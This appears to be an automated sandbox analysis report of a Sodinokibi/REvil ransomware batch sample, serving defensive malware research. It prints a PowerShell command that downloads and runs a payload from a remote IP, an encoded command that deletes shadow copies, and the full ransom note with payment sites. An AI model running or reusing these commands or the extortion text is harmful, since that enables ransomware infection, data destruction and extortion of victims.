Analysis

  • max time kernel
    137s
  • max time network
    54s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    08-06-2020 00:10

General

  • Target

    834fe3c10a5c6788c12a8dfd6b3a22bc.bat

  • Size

    219B

  • MD5

    9aeae02203b8a1236ef5aa06a8df49df

  • SHA1

    f33e529e1dd812bd81e80fcc6b08c5d019184c74

  • SHA256

    4792e10c28499b9868f31d6a7dd670cf12a22f14d11a7b0bb8c781289743eed7

  • SHA512

    fdfe723f2cbf8c3f3b1a8b4211955bc60bf24f98ac81a719821e52ed5883cbdbf8b872107b5b4ae1ae5f3a6477f201f59c9452641624f4f06a61358b8013dc6e

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc

Extracted

Path

C:\385fl2i-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 385fl2i. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D80EBFA21144DC89 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/D80EBFA21144DC89 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Z0/SZKFmxWraUEFJICHuuTvtUs1nKZakMuALSpckWVAa2nreuus/jVRkcFskJijT Wpa5anCSLM2xD6nZEEB7vsQuNek2XzOWBgyud7XrDuSvV1607W6Rs4SMDBbV+Ncw jbOzF7RFo016+L7WQPEXxnNdYSABLHdOgaEOc2zud5KMCcVl/1zqO/Irm50Y+IKD eUgY6bHQNY0sUhV9ZhNe10xZ6QCcmy+bPm8wflZ+hanipUWgHFJoX3MWcbP/WHmI 5FW3SpAsz4V8Blan+saybJYqdspw0lbT40Shyv0a9NWyYZ/Zefv04sQqjYR4n5ID etcvOgwpYb8e3iiErXEAm529BQBXPCL0ma+mzEfaVEcN6M0yJuAm5Mi7Z0fCIzrX OlqaCNBCxCj38W5dQCkMQAQyqbacksfmkmpI1CsOEj3tZpGWq7Sa/MuZgmzZHYiy jRNcoj8oyXGWaGAjDVm8TS03Yvf5+vrwqDzfvZIj7fxYmFcJD9OJMfW+ZEjfY93q g9bqVjk7TkZbKleYQfRZMOGympvrFQEdOCgIjPsnSlz4e9rxH4kAeEn8o05OcV55 xYkr2xkKrhlBJHTVXXaE6ZeIJfKMTlU4Zu4AMW7Bz9VUEBObzplHGYFX9g/nZUR4 M2yZ0JopuznB/6c79MJHpImqIpOiL84JhcIjUx02/1FuL8Le7D5nYKmSW2JDIr2T HyMJrdXWq6SvaA5Hm3+TXYgZLJ3EutPg5aKe4s1NrcKa4mCjclmnMUEIJvQtS49o bcG6Q3RSzogK+8+YoirxGbzjZJIMq3TRT/QSxIm1GWCyXDR8UNU0L72pH5Um7zI9 A8zxqlALykryVSzT4SRToTJTdk2cS0b7EJTxhxFCUeyCOKMhyaN4fsK7CQhseB3o nHiX1MMWrn9xqjwbAloWeGdLAZvwRuliKOUNfUTpziq1AVkcAPl6maOdwMWS7Rh8 PJg4CwKNLT1Lfo8chwQQ0wSCt0nEPJrGNpIi/qqVOgr99aDY8SdcyLdPygCOOd2q 1pgSXu7I+95s4Us7+B4BkMM15ueGBjtdGy13V29kW+20p38WPM+0wjJvlFsQ9rlL 1GYqzhugKV7Bv0alh0nKythw+Qk42zBbEeIPA1r1HRYBAfHD4rfGkAeezCaKoyPe J3t/8Ys4E7eOee0JcDKIXGXcmg+gIDQIFlycyWgBuGmEmGbZBa/u7VnrOxP9zYdG X6Qt7zQi4nlxPg4xoih2RfrhQzR9CFc7OLyWPKgQNoHhb/E15/WTego16ZGAHNdJ HLYA7yCm7+kY1OL6VU3WmuGXBDN+XvtXrHGLnHVhEKUTbQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D80EBFA21144DC89

http://decryptor.cc/D80EBFA21144DC89

Signatures

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\834fe3c10a5c6788c12a8dfd6b3a22bc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/834fe3c10a5c6788c12a8dfd6b3a22bc');Invoke-XMIUQZERWSSC;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      PID:996
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1768
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1612

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms